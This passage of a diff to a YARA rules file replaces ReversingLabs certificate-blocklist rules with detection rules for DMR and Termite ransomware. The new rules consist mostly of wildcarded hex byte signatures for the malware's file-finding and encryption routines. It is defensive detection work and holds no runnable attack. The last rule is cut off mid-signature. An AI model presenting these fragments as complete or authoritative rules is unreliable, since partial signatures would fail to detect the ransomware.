-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"IP EM\"" and pe.signatures [ i ] . serial == "68:4f:47:8c:72:59:dd:e0:cf:e2:26:01:12:ca:98:46" and 1584981648 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( $create_encryption_key ) and ( $encrypt_encryption_key ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0B7C32208A954A483Dd102E1Be094867 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_DMR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DMR ransomware."
 		author = "ReversingLabs"
-		id = "d16e74d8-2c46-508b-b518-a542603ca726"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "45d8f91f-d2d0-5c6e-a29e-b8c9c29dc296"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4014-L4030"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DMR.yara#L1-L214"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "49e2208a7d2b5684283c1dfc9856f864d16b50f951f58e0252c97419819a46ec"
+		logic_hash = "55e19f3017c2cc8355c27f9a516e611b58b108f15bfed41b88d5662b55677a59"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DMR"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
+            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
+            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
+            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
+            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
+            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
+            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74
+        }
+		$find_files_p2 = {
+            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
+            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
+            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
+            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 55 ?? FF B5 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8B 55 ?? 88 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? 8D 55 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 45 ??
+            83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 E0 ?? 8D 4D ?? 83 7D ?? ?? 50 0F 43
+        }
+		$encrypt_files_p2 = {
+            4D ?? 51 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 8D
+            ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D BE ??
+            ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B C7 89 BD ?? ?? ?? ?? 72 ?? 8B 07 83 7F ?? ?? 75
+            ?? 0F B6 00 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? C7 86 ?? ?? ?? ?? ??
+            ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8B 86 ?? ?? ?? ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 8B 86 ?? ??
+            ?? ?? 83 7D ?? ?? 99 0F 43 4D ?? 52 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 8B 55 ?? 3B CA 77 ?? 83 7D ?? ?? 8D 45 ?? 89 4D ?? 0F 43 45 ?? C6 04 01 ??
+            EB ?? 8B 45 ?? 8B F9 2B FA 2B C2 3B F8 77 ?? 83 7D ?? ?? 8D 75 ?? 57 0F 43 75 ?? 03
+        }
+		$encrypt_files_p3 = {
+            F2 89 4D ?? 6A ?? 56 E8 ?? ?? ?? ?? C6 04 3E ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? EB ?? 6A
+            ?? 57 C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B BD ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8
+            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D
+            85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B
+            08 6A ?? 8B 11 8B C8 FF D2 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 D2 8B 40 ?? 03 C8
+            B8 ?? ?? ?? ?? 39 51 ?? 0F 45 C2 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ??
+            03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 6A ?? 50 E8 ?? ?? ?? ??
+            81 C6 ?? ?? ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
+        }
+		$encrypt_files_p4 = {
+            C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B 47 ?? 72 ?? 8B 3F 83 F8 ?? 75
+            ?? 0F B6 07 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B BD ?? ?? ?? ?? 85 C0 75 ?? 8D
+            45 ?? 50 83 EC ?? 8D 87 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC
+            ?? C6 45 ?? ?? 8B CC 56 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB ?? 8B BD ?? ??
+            ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
+            8D 45 ?? 3B C6 74 ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 FF 76 ?? 8D 4D ?? 50 E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 C7 46 ??
+            ?? ?? ?? ?? 8D 55 ?? C6 00 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? FF 75 ?? 0F 43 55 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ??
+            0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B C8 C6
+            45 ?? ?? 8B 41 ?? 8B 51 ?? 2B C2 83 F8 ?? 72 ?? 83 79 ?? ?? 8D 42 ?? 89 41 ?? 8B C1
+            72 ?? 8B 01 66 C7 04 02 ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 0F 10 01 0F 11 85 ?? ?? ?? ?? F3 0F 7E 41 ?? 66 0F D6 85 ?? ?? ?? ??
+            C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B
+        }
+		$encrypt_files_p5 = {
+            C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? C7 04 01 ?? ?? ?? ?? C6 44 01 ?? ?? 8D 85 ?? ?? ??
+            ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ??
+            ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8D 47 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11
+            85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ??
+            ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83
+            F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ??
+            ?? 66 C7 04 08 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66
+            0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45
+        }
+		$encrypt_files_p6 = {
+            8B BD ?? ?? ?? ?? 8B C7 8B 8D ?? ?? ?? ?? 2B C1 8B 56 ?? 3B D0 76 ?? 8B 46 ?? 2B C2
+            3B C1 72 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 8B CE 50 6A ?? E8 ??
+            ?? ?? ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85
+            ?? ?? ?? ?? C6 00 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ??
+            ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? 72 ?? 83 FA ??
+            8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 03 F1 89 85 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? C6 46 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66
+            0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ??
+            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
+            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81
+        }
+		$encrypt_files_p7 = {
+            FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52
+            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
+            8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
+            83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ??
+            83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B
+        }
+		$encrypt_files_p8 = {
+            95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
+            8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
+            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 EC ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0
+            C6 45 ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
+            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ??
+            ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+        }
+		$encrypt_files_p9 = {
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
+            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
+            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ??
+            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55
+            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
+            59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Win Sp Z O O" and pe.signatures [ i ] . serial == "0b:7c:32:20:8a:95:4a:48:3d:d1:02:e1:be:09:48:67" and 1583884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3E72Daf2B9A4449E946009E5084A8E76 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Termite : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Termite ransomware."
 		author = "ReversingLabs"
-		id = "aa7c6cbe-0794-59e3-a675-93beeccc9784"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "350011fa-1e3c-5079-8fe7-968340a3aca0"
+		date = "2020-08-31"
+		modified = "2020-08-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4032-L4048"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Termite.yara#L1-L151"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f1a7bf6c18e0ebf8aef53feb7d7789ce87c96e00962c64e07a37d968702d2fa5"
+		logic_hash = "df273de81fc58cb0bacf021ee539ec6dbfa1f1a3e13bd46519ee313595cafb4c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Termite"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
